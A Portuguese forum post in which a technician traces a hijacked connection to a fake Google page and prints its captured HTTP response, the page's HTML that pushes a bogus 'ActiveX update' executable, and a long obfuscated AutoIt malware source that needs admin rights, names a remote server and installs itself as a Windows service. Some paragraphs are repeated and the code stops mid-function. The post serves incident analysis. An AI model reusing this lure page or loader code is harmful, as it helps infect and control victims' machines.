Tweet
Fui chamado para resolver problemas de conectividade em uma empresa da região.
Não demorei muito para ver o problema: havia uma mensagem de erro e um download quando acessava websites grandes, como o Google.
Era exibida uma página, vinda do endereço IP 190.120.227.114. O servidor usava Apache 2.2.14 em um Ubuntu 4.15.
Uma mensagem pedia para atualizar o ActiveX, e aparecia em todos os navegadores.
Porém, quando fui tentar fazer uma pesquisa no Google usando a ferramenta de pesquisa "digitando na barra de endereço" do Chrome, ele me retornou um erro 404, dizendo que o Google usava Apache e Ubuntu.
O Google sanitiza páginas de erro e usa um servidor web chamado GWS (Google WebServer - uma compilação do próprio Apache). Definitivamente aquele não era o Google.
Pensei em várias coisas, algum tipo de spoofing, mas o problema não ocorria com outras máquinas da mesma rede.
Então, resolvi baixar o suposto arquivo "atualizador de ActiveX" que a mensagem sugeria.
Ele estava em um diretório chamado "app", e era executável. Quando tentei acessar um possível Index do Apache no diretório "app" me retornou um erro 500 (Internal Server Error). Possivelmente um .htaccess mal escrito.
Tudo bem. Arquivo baixado, ele tinha o ícone padrão do Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Sei que AutoIt, quando não instalado e configurado o AutoItWrapper, em seus arquivos compilados deixa a versão da linguagem usada. Atualmente, estamos na versão 3 e alguma coisa. Aquele arquivo era escrito na versão 1.0.0.2.
Código-fonte do arquivo baixado:
Informações do IP
Informações do dono
Entrei em contato com o webhoster via chat:
Logo quando tiver tempo vou enviar este e-mail e estudar melhor este código-fonte, e uma forma de remoção. Também vou estar enviando para AV researchers.
Por uma rápida olhada, parece ser um trojan, ou servidor de botnet, que notifica o servidor remoto, mas o código está muito ofuscado e cansativo de se ler.
Você pode baixar o código-fonte completo do vírus, bem como binários, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Não execute os arquivos se não souber o que está fazendo.
Não demorei muito para ver o problema: havia uma mensagem de erro e um download quando acessava websites grandes, como o Google.
Era exibida uma página, vinda do endereço IP 190.120.227.114. O servidor usava Apache 2.2.14 em um Ubuntu 4.15.
Uma mensagem pedia para atualizar o ActiveX, e aparecia em todos os navegadores.
Código:
Send: Return Code: 0x00000000
GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: pt-br
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.google.com.br
Connection: Keep-Alive
Receive: Return Code: 0x00000000
HTTP/1.1 200 OK
Date: Thu, 12 Jul 2012 19:05:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.15
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 378
Connection: close
Content-Type: text/html
Receive: Return Code: 0x00000000
00000000 1F 8B 08 00 00 00 00 00 00 03 85 50 5F 4B E3 40 ...........P_K.@
00000010 10 7F 36 9F 62 BA 4F 0A 26 63 11 A1 B5 49 E1 2E .6.b.O.&c...I..
00000020 2D 28 A8 57 24 D2 BB 27 19 93 B5 5D 49 77 E3 EE -(.W$..'...]Iw..
00000030 A4 89 CA 7D DA 7B B8 AF E1 A6 A9 E0 81 70 4F 3B ...}.{.......pO;
00000040 3B FC FE 4E 3C 98 FD 48 B3 5F 8B 39 AC 79 53 C2 ;..N<..H._.9.yS.
00000050 E2 EE FB D5 65 0A 22 44 5C 9E A6 88 B3 6C 06 3F ....e."D\....l.?
00000060 2F B2 EB 2B 18 46 27 90 59 D2 4E B1 32 9A 4A C4 /..+.F'.Y.N.2.J.
00000070 F9 8D 00 B1 66 AE CE 11 9B A6 89 9A D3 C8 D8 15 ....f...........
00000080 66 B7 D8 76 5A C3 8E BC 1F 43 FE C4 8C 0A 2E C4 f..vZ....C......
00000090 34 88 77 86 ED A6 D4 2E F9 42 66 38 1E 8F 7B F6 4.w......Bf8..{.
000000A0 0E 2B A9 F0 CF 46 32 41 87 0D E5 73 AD B6 89 48 .+...F2A...s...H
000000B0 8D 66 A9 39 CC 5E 2A 29 20 EF 7F 89 60 D9 32 76 .f.9.^*) ..`.2v
000000C0 DC 09 E4 6B B2 4E 72 A2 9C 09 47 A3 B3 71 38 14 ...k.Nr...G..q8.
000000D0 80 5E 8A 15 97 72 FA 2D 67 B5 95 2D 2C 95 2E 4C .^...r.-g..-,..L
000000E0 E3 60 26 1D 71 4D A5 7A A5 C2 C4 D8 83 82 D8 E5 .`&.qM.z........
000000F0 56 55 0C EC 5D F6 E2 4F B4 A5 7E EB E3 3D D6 3A VU..]..O..~..=.:
00000100 EF BA 41 5D 15 C4 F2 F0 08 DE 82 03 2A A5 E5 43 ..A]........*..C
00000110 31 B7 D6 80 A6 2E DB A3 5A D5 96 FE FE 31 50 74 1.......Z....1Pt
00000120 AB AD 5C 79 13 7B 0C 4A 3B F6 68 30 40 55 A9 72 ..\y.{.J;.h0@U.r
00000130 F2 91 3C 44 C2 47 12 CF 18 88 A3 49 70 D0 EC 52 ..<D.G.....Ip..R
00000140 46 A5 E9 30 DE 2E 01 81 54 55 98 9A CD DA 38 BE F..0....TU....8.
00000150 F7 73 24 5B 29 26 C1 EF 20 C6 3E 9E 4F 8F FB EB .s$[)&.. .>.O...
00000160 3D 98 E2 E5 FF 65 3E 3A 4C FE 91 D8 73 77 47 9D =....e>:L...swG.
00000170 BE 03 69 12 CF 7B 35 02 00 00 ..i..{5...
Código HTML:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Activex Windows Desatualizado</title> <script type="text/javascript"> function update() { alert("Erro na configuração do navegador, instale o aplicativo de atualização!"); window.location = "/app/Comhost_app.exe"; } </script> </head> <body> <script type="text/javascript"> update(); </script> </body> </html>
O Google sanitiza páginas de erro e usa um servidor web chamado GWS (Google WebServer - uma compilação do próprio Apache). Definitivamente aquele não era o Google.
Pensei em várias coisas, algum tipo de spoofing, mas o problema não ocorria com outras máquinas da mesma rede.
Então, resolvi baixar o suposto arquivo "atualizador de ActiveX" que a mensagem sugeria.
Ele estava em um diretório chamado "app", e era executável. Quando tentei acessar um possível Index do Apache no diretório "app" me retornou um erro 500 (Internal Server Error). Possivelmente um .htaccess mal escrito.
Tudo bem. Arquivo baixado, ele tinha o ícone padrão do Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Sei que AutoIt, quando não instalado e configurado o AutoItWrapper, em seus arquivos compilados deixa a versão da linguagem usada. Atualmente, estamos na versão 3 e alguma coisa. Aquele arquivo era escrito na versão 1.0.0.2.
Código-fonte do arquivo baixado:
Código:
#NoTrayIcon
#RequireAdmin
Global $Var0001 = "auto_7"
Global $Var0002 = "Auto 7"
Global $Var0003 = "gb_service.exe"
Global $Var0004 = "http://190.120.227.114"
Global Const $Var0005 = "ServicesActive"
Global Const $Var0006 = 0x00010000
Global Const $Var0007 = 0x00020000
Global Const $Var0008 = 0x00040000
Global Const $Var0009 = 0x00080000
Global Const $Var0010 = BitOR($Var0006, $Var0007, $Var0008, $Var0009)
Global Const $Var0011 = 1
Global Const $Var0012 = 2
Global Const $Var0013 = 1
Global Const $Var0014 = 0x00000010
Global Const $Var0015 = 0x00000020
Global Const $Var0016 = 0x00000080
Global Const $Var0017 = 0x000f01ff
Global Const $Var0018 = 1
Global Const $Var0019 = 2
Global Const $Var0020 = 3
Global Const $Var0021 = 4
Global Const $Var0022 = 14
Global Const $Var0023 = 1
Global Const $Var0024 = 2
Global Const $Var0025 = 3
Global Const $Var0026 = 4
Global Const $Var0027 = 5
Global Const $Var0028 = 6
Global Const $Var0029 = 7
Global Const $Var0030 = 8
Global Const $Var0031 = 9
Global Const $Var0032 = 1
Global Const $Var0033 = 2
Global Const $Var0034 = 4
Global Const $Var0035 = 8
Global Const $Var0036 = BitOR($Var0032, $Var0033, $Var0035)
Global Const $Var0037 = 0x00000010
Global Const $Var0038 = 0x00000020
Global Const $Var0039 = BitOR($Var0037, $Var0038)
Global Const $Var0040 = 0x00000100
Global Const $Var0041 = BitOR($Var0039, $Var0034, $Var0036, $Var0040)
Global Const $Var0042 = 2
Global Const $Var0043 = 0
Global Const $Var0044 = 1
Global Const $Var0045 = 2
Global Const $Var0046 = 3
Global Const $Var0047 = 4
Global Const $Var0048 = 7
Global Const $Var0049 = 1
Global Const $Var0050 = 0x00000080
Global Const $Var0051 = 1
Global Const $Var0052 = 2
Global Const $Var0053 = BitOR($Var0051, $Var0052)
Global Const $Var0054 = 0x00000078
Global Const $Var0055 = 0
Global $Var0056, $Var0057, $Var0058, $Var0059, $Var0060 = False
Global $Var0061 = DllStructCreate("dword dwServiceType;" & "dword dwCurrentState;dword dwControlsAccepted;dword dwWin32ExitCode;" & "dword dwServiceSpecificExitCode;dword dwCheckPoint;dword dwWaitHint")
Global $Var0062
Global $Var0063
Global $Var0064
Global $Var0065 = 1
Global $Var0066 = DllOpen("advapi32.dll")
Global $Var0067
Global $Var0068 = "SessionChange" & "_" & @MDAY & "." & @MON & "." & @YEAR & " _ " & @HOUR & "." & @MIN & "." & @SEC & ".log"
Global $Var0069 = RegRead("HKEY_LOCAL_MACHINE\Software\SessionChange", "LogfilePath")
Global $Var0070 = FileOpen($Var0069 & "\" & $Var0068, 1)
Fn0001("", 1)
Func Fn0001($__01, $__02 = 0, $__03 = 0)
Dim $a57c0301d0f[12]
$a57c0301d0f[0] = "January"
$a57c0301d0f[1] = "February"
$a57c0301d0f[2] = "March"
$a57c0301d0f[3] = "April"
$a57c0301d0f[4] = "May"
$a57c0301d0f[5] = "June"
$a57c0301d0f[6] = "July"
$a57c0301d0f[7] = "August"
$a57c0301d0f[8] = "September"
$a57c0301d0f[9] = "October"
$a57c0301d0f[10] = "November"
$a57c0301d0f[11] = "December"
If @HOUR > 12 Then
$a05d0f01132 = @HOUR - 12
$a47e020130c = " PM"
Else
$a05d0f01132 = @HOUR
$a47e020130c = " AM"
EndIf
If $__02 = 1 Then
Local $locVar0001 = "Log created: " & $a57c0301d0f[@MON - 1] & " " & @MDAY & ", " & @YEAR & " : " & $a05d0f01132 & ":" & @MIN & ":" & @SEC & $a47e020130c
Fn0002(StringLen($locVar0001), "_")
FileWriteLine($Var0070, $locVar0001)
Fn0002(StringLen($locVar0001), "_")
FileWriteLine($Var0070, @CRLF & @CRLF)
Else
Local $locVar0001 = ""
For $a26f0801633 = 1 To $__03
$locVar0001 = $locVar0001 & @CRLF
Next
$locVar0001 = $locVar0001 & $a57c0301d0f[@MON - 1] & " " & @MDAY & ", " & @YEAR & " : " & $a05d0f01132 & ":" & @MIN & ":" & @SEC & $a47e020130c & " [" & @AutoItPID & "] >> " & $__01
FileWriteLine($Var0070, $locVar0001)
EndIf
EndFunc
Func Fn0002($__01, $__02)
Local $locVar0001 = ""
For $a26f0801633 = 1 To $__01
$locVar0001 = $locVar0001 & $__02
Next
FileWriteLine($Var0070, $locVar0001)
EndFunc
Global Const $Var0071 = "struct;long X;long Y;endstruct"
Global Const $Var0072 = "struct;long Left;long Top;long Right;long Bottom;endstruct"
Global Const $Var0073 = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct"
Global Const $Var0074 = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct"
Global Const $Var0075 = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param"
Global Const $Var0076 = $Var0074 & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param"
Global Const $Var0077 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid"
Global Const $Var0078 = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClVar0255ingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset"
Global Const $Var0079 = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask"
Global Const $Var0080 = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct"
Global Const $Var0081 = $Var0074 & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param"
Global Const $Var0082 = "struct;" & $Var0074 & ";dword dwDrawStage;handle hdc;" & $Var0072 & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartId;int iStateId;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign"
Global Const $Var0083 = $Var0074 & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $Var0071 & ";lparam lParam;uint KeyFlags"
Global Const $Var0084 = "uint Size;" & $Var0071 & ";uint Hit;" & $Var0073 & ";" & $Var0072 & ";int iOffset;int iRow;int iCol"
Global Const $Var0085 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span"
Global Const $Var0086 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet"
Global Const $Var0087 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds"
Global Const $Var0088 = $Var0074 & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct"
Global Const $Var0089 = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct"
Global Const $Var0090 = $Var0074 & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct"
Global Const $Var0091 = "struct;" & $Var0074 & ";dword DrawStage;handle HDC;" & $Var0072 & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level"
Global Const $Var0092 = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem"
Global Const $Var0093 = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader;" & $Var0072 & ";uint uChevronState"
Global Const $Var0094 = $Var0074 & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct"
Global Const $Var0095 = $Var0074 & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct"
Global Const $Var0096 = $Var0074 & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $Var0072
Global Const $Var0097 = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx"
Global Const $Var0098 = "struct;dword Size;long Width;long Height;word Planes;word BitCount;dword Compression;dword SizeImage;" & "long XPelsPerMeter;long YPelsPerMeter;dword ClrUsed;dword ClrImportant;endstruct;dword RGBQuad"
Global Const $Var0099 = "dword cbSize;" & $Var0072 & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]"
Global Const $Var0100 = "long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32]"
Global Const $Var0101 = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError"
Global Const $Var0102 = "dword Length;ptr Descriptor;bool InheritHandle"
Global Const $Var0103 = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet"
Global Const $Var0104 = 0x00020000
Global Const $Var0105 = 0x000f0000
Global Const $Var0106 = $Var0104
Global Const $Var0107 = $Var0104
Global Const $Var0108 = 0x001f0000
Func Fn0003($__01 = @error, $__02 = @extended)
Local $locVar0001 = DllCall("kernel32.dll", "dword", "GetLastError")
Return SetError($__01, $__02, $locVar0001[0])
EndFunc
Global Const $Var0109 = Ptr(-1)
Global Const $Var0110 = Ptr(-1)
Global Const $Var0111 = 0x00000100
Global Const $Var0112 = 0x00002000
Global Const $Var0113 = 0x00008000
Global Const $Var0114 = BitShift($Var0111, 8)
Global Const $Var0115 = BitShift($Var0112, 8)
Global Const $Var0116 = BitShift($Var0113, 8)
Global Const $Var0117 = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual"
Func Fn0004($__01 = 0, $__02 = True, $__03 = True, $__04 = "")
Local $locVar0001 = "wstr"
If $__04 = "" Then
$__04 = 0
$locVar0001 = "ptr"
EndIf
Local $locVar0002 = DllCall("kernel32.dll", "handle", "CreateEventW", "ptr", $__01, "bool", $__02, "bool", $__03, $locVar0001, $__04)
If @error Then Return SetError(@error, @extended, 0)
Return $locVar0002[0]
EndFunc
Func Fn0005($__01)
Local $locVar0001 = DllCall("kernel32.dll", "bool", "SetEvent", "handle", $__01)
If @error Then Return SetError(@error, @extended, False)
Return $locVar0001[0]
EndFunc
Func Fn0006($__01, $__02, $__03, $__04, $__05, $__06, $__07 = Default, $__08 = Default, $__09 = Default, $__10 = Default, $__11 = Default, $__12 = "")
Local $locVar0001, $locVar0002, $locVar0003, $locVar0004, $locVar0005, $locVar0006, $locVar0007, $locVar0008
$locVar0001 = DllStructCreate("wchar[" & Number($__07 <> Default) * (StringLen($__07) + 1) & "]")
DllStructSetData($locVar0001, 1, $__07)
$locVar0002 = DllStructCreate("dword[" & Number($__08) & "]")
If IsArray($__09) Then
Local $locVar0009, $locVar0010
$locVar0009 = UBound($__09) - 1
For $a2fd190023a = 0 To $locVar0009
$locVar0010 &= "wchar[" & StringLen($__09[$a2fd190023a]) + 1 & "];"
Next
$locVar0003 = DllStructCreate(StringTrimRight($locVar0010, 1))
For $a2fd190023a = 0 To $locVar0009
DllStructSetData($locVar0003, $a2fd190023a + 1, $__09[$a2fd190023a])
Next
Else
$locVar0003 = DllStructCreate("wchar[" & Number($__09 <> Default) * (StringLen($__09) + 1) & "]")
DllStructSetData($locVar0003, 1, $__09)
EndIf
$locVar0004 = DllStructCreate("wchar[" & Number($__10 <> Default) * (StringLen($__10) + 1) & "]")
DllStructSetData($locVar0004, 1, $__10)
$locVar0005 = DllStructCreate("wchar[" & Number($__11 <> Default) * (StringLen($__11) + 1) & "]")
DllStructSetData($locVar0005, 1, $__11)
$locVar0006 = Fn0014($__12, $Var0012)
$locVar0007 = DllCall($Var0066, "ptr", "CreateServiceW", "ptr", $locVar0006, "wstr", $__01, "wstr", $__02, "dword", $Var0017, "dword", $__03, "dword", $__04, "dword", $__05, "wstr", $__06, "ptr", DllStructGetPtr($locVar0001), "ptr", DllStructGetPtr($locVar0002), "ptr", DllStructGetPtr($locVar0003), "ptr", DllStructGetPtr($locVar0004), "ptr", DllStructGetPtr($locVar0005))
If $locVar0007[0] = 0 Then
$locVar0008 = Fn0003()
Else
Fn0012($locVar0007[0])
EndIf
Fn0012($locVar0006)
Return SetError($locVar0008, DllStructGetData($locVar0002, 1), Number($locVar0007[0] <> 0))
EndFunc
Func Fn0007($__01, $__02 = "")
Local $locVar0001, $locVar0002, $locVar0003, $locVar0004
$locVar0001 = Fn0014($__02, $Var0011)
$locVar0002 = Fn0015($locVar0001, $__01, $Var0006)
$locVar0003 = DllCall($Var0066, "int", "DeleteService", "ptr", $locVar0002)
If $locVar0003[0] = 0 Then $locVar0004 = Fn0003()
Fn0012($locVar0002)
Fn0012($locVar0001)
Return SetError($locVar0004, 0, $locVar0003[0])
EndFunc
Func Fn0008($__01, $__02 = "")
Local $locVar0001, $locVar0002
$locVar0001 = Fn0014($__02, $Var0011)
$locVar0002 = Fn0015($locVar0001, $__01, $Var0016)
Fn0012($locVar0002)
Fn0012($locVar0001)
Return Number($locVar0002 <> 0)
EndFunc
Func Fn0009($__01, $__02 = "")
Local $locVar0001, $locVar0002, $locVar0003, $locVar0004, $locVar0005, $locVar0006, $locVar0007
$locVar0001 = Fn0014($__02, $Var0011)
$locVar0002 = Fn0015($locVar0001, $__01, $Var0013)
$locVar0003 = Fn0016($locVar0002, 0, 0)
$locVar0004 = DllStructCreate("ubyte[" & $locVar0003[4] & "]")
$locVar0005 = Fn0016($locVar0002, DllStructGetPtr($locVar0004), DllStructGetSize($locVar0004))
If $locVar0005[0] = 0 Then $locVar0006 = Fn0003()
Fn0012($locVar0002)
Fn0012($locVar0001)
$locVar0007 = DllStructCreate("dword[3];uint_ptr[2];dword;uint_ptr[3]", $locVar0005[2])
Return SetError($locVar0006, 0, DllStructGetData($locVar0007, 1, 1))
EndFunc
Func Fn0010($__01, $__02 = "")
Local $locVar0001, $locVar0002, $locVar0003, $locVar0004
$locVar0001 = Fn0014($__02, $Var0011)
$locVar0002 = Fn0015($locVar0001, $__01, $Var0014)
$locVar0003 = DllCall($Var0066, "int", "StartServiceW", "ptr", $locVar0002, "dword", 0, "ptr", 0)
If $locVar0003[0] = 0 Then $locVar0004 = Fn0003()
Fn0012($locVar0002)
Fn0012($locVar0001)
Return SetError($locVar0004, 0, $locVar0003[0])
EndFunc
Func Fn0011($__01, $__02 = "")
Local $locVar0001, $locVar0002, $locVar0003, $locVar0004
$locVar0001 = Fn0014($__02, $Var0011)
$locVar0002 = Fn0015($locVar0001, $__01, $Var0015)
$locVar0003 = Fn0013($locVar0002, $Var0018)
If $locVar0003 = 0 Then $locVar0004 = Fn0003()
Fn0012($locVar0002)
Fn0012($locVar0001)
Return SetError($locVar0004, 0, $locVar0003)
EndFunc
Func Fn0012($__01)
Local $locVar0001 = DllCall($Var0066, "int", "ClVar0255eServiceHandle", "ptr", $__01)
If @error Then Return SetError(@error, 0, 0)
Return $locVar0001[0]
EndFunc
Func Fn0013($__01, $__02)
Local $locVar0001 = DllCall($Var0066, "int", "ControlService", "ptr", $__01, "dword", $__02, "ptr*", 0)
If @error Then Return SetError(@error, 0, 0)
Return $locVar0001[0]
EndFunc
Func Fn0014($__01, $__02)
Local $locVar0001 = DllCall($Var0066, "ptr", "OpenSCManagerW", "wstr", $__01, "wstr", $Var0005, "dword", $__02)
If @error Then Return SetError(@error, 0, 0)
Return $locVar0001[0]
EndFunc
Func Fn0015($__01, $__02, $__03)
Local $locVar0001 = DllCall($Var0066, "ptr", "OpenServiceW", "ptr", $__01, "wstr", $__02, "dword", $__03)
If @error Then Return SetError(@error, 0, 0)
Return $locVar0001[0]
EndFunc
Func Fn0016($__01, $__02, $__03)
Local $locVar0001 = DllCall($Var0066, "int", "QueryServiceConfigW", "ptr", $__01, "ptr", $__02, "dword", $__03, "dword*", 0)
Return $locVar0001
EndFunc
Func Fn0017($__01)
$Var0063 = Fn0009($__01)
$Var0057 = DllCallbackRegister("Fn0020", "dword", "dword;dword;ptr;ptr")
$Var0058 = DllCallbackRegister("Fn0018", "none", "dword;ptr")
$Var0059 = DllStructCreate("ptr[2];ptr[2]")
$Var0056 = DllStructCreate("wchar[128]")
DllStructSetData($Var0056, 1, $__01)
DllStructSetData($Var0059, 1, DllStructGetPtr($Var0056), 1)
DllStructSetData($Var0059, 1, DllCallbackGetPtr($Var0058), 2)
DllStructSetData($Var0059, 2, 0, 1)
DllStructSetData($Var0059, 2, 0, 2)
DllCall($Var0066, "int", "StartServiceCtrlDispatcherW", "ptr", DllStructGetPtr($Var0059))
DllCallbackFree($Var0058)
DllCallbackFree($Var0057)
EndFunc
Func Fn0018($__01, $__02)
Local $locVar0001 = DllCall($Var0066, "ptr", "RegisterServiceCtrlHandlerExW", "ptr", DllStructGetPtr($Var0056), "ptr", DllCallbackGetPtr($Var0057), "ptr", 0)
If @error OR ($locVar0001[0] = 0) Then Exit
$Var0062 = $locVar0001[0]
If NOT $Var0062 Then
Fn0019()
Return
EndIf
DllStructSetData($Var0061, "dwServiceType", $Var0063)
DllStructSetData($Var0061, "dwServiceSpecificExitCode", 0)
If NOT (Fn0021($Var0045, $Var0055, 0x00000bb8)) Then
Fn0019()
Return
EndIf
Fn0023($__01, $__02)
Fn0043()
EndFunc
Func Fn0019()
If $Var0062 Then Fn0021($Var0044, $Var0055, 0)
EndFunc
Func Fn0020($__01, $__02, $__03, $__04)
#forceref $A4A82503603, $A2082605313, $A4582700A29
Local $locVar0001 = $Var0055
Switch $__01
Case $Var0018
Fn0021($Var0046, $Var0055, 0x00000bb8)
Fn0024()
Return $Var0055
Case $Var0019
DllStructSetData($Var0061, "dwCurrentState", $Var0048)
Case $Var0020
DllStructSetData($Var0061, "dwCurrentState", $Var0047)
Case $Var0021
Case $Var0022
Local $locVar0002 = DllStructCreate("dword cbsize; dword dwSessionId", $__03)
Local $locVar0003 = DllStructGetData($locVar0002, "cbSize")
Local $locVar0004 = DllStructGetData($locVar0002, "dwSessionId")
Fn0001("cbSize = " & $locVar0003 & " ,dwSessionId = " & $locVar0004)
Switch $__02
Case $Var0023
Fn0001("Console session connected", 0, 2)
Case $Var0024
Fn0001("Console session disconnected", 0, 2)
Case $Var0025
Fn0001("Remote session connected", 0, 2)
Case $Var0026
Fn0001("Remote session disconnected", 0, 2)
Case $Var0027
Fn0001("Session logged on", 0, 2)
Case $Var0028
Fn0001("Session logged off", 0, 2)
Case $Var0029
Fn0001("Session locked", 0, 2)
Case $Var0030
Fn0001("Session unlocked", 0, 2)
Case $Var0031
Fn0001("Session remote control", 0, 2)
EndSwitch
Case 0x00000080 To 0x000000ff
Case Else
$locVar0001 = $Var0054
EndSwitch
Fn0021(DllStructGetData($Var0061, "dwCurrentState"), $Var0055, 0)
Return $locVar0001
EndFunc
Func Fn0021($__01, $__02, $__03)
Local $locVar0001 = True
If NOT $Var0060 Then
If ($__01 = $Var0045) Then
DllStructSetData($Var0061, "dwControlsAccepted", 0)
Else
DllStructSetData($Var0061, "dwControlsAccepted", BitOR($Var0049, $Var0050))
EndIf
DllStructSetData($Var0061, "dwCurrentState", $__01)
DllStructSetData($Var0061, "dwWin32ExitCode", $__02)
DllStructSetData($Var0061, "dwWaitHint", $__03)
If ($__01 = $Var0047) OR ($__01 = $Var0044) Then
DllStructSetData($Var0061, "dwCheckPoint", 0)
Else
$Var0065 += 1
DllStructSetData($Var0061, "dwCheckPoint", $Var0065)
EndIf
$locVar0001 = Fn0022($Var0062, DllStructGetPtr($Var0061))
EndIf
Return $locVar0001
EndFunc
Func Fn0022($__01, $__02)
Local $locVar0001 = DllCall($Var0066, "int", "SetServiceStatus", "ptr", $__01, "ptr", $__02)
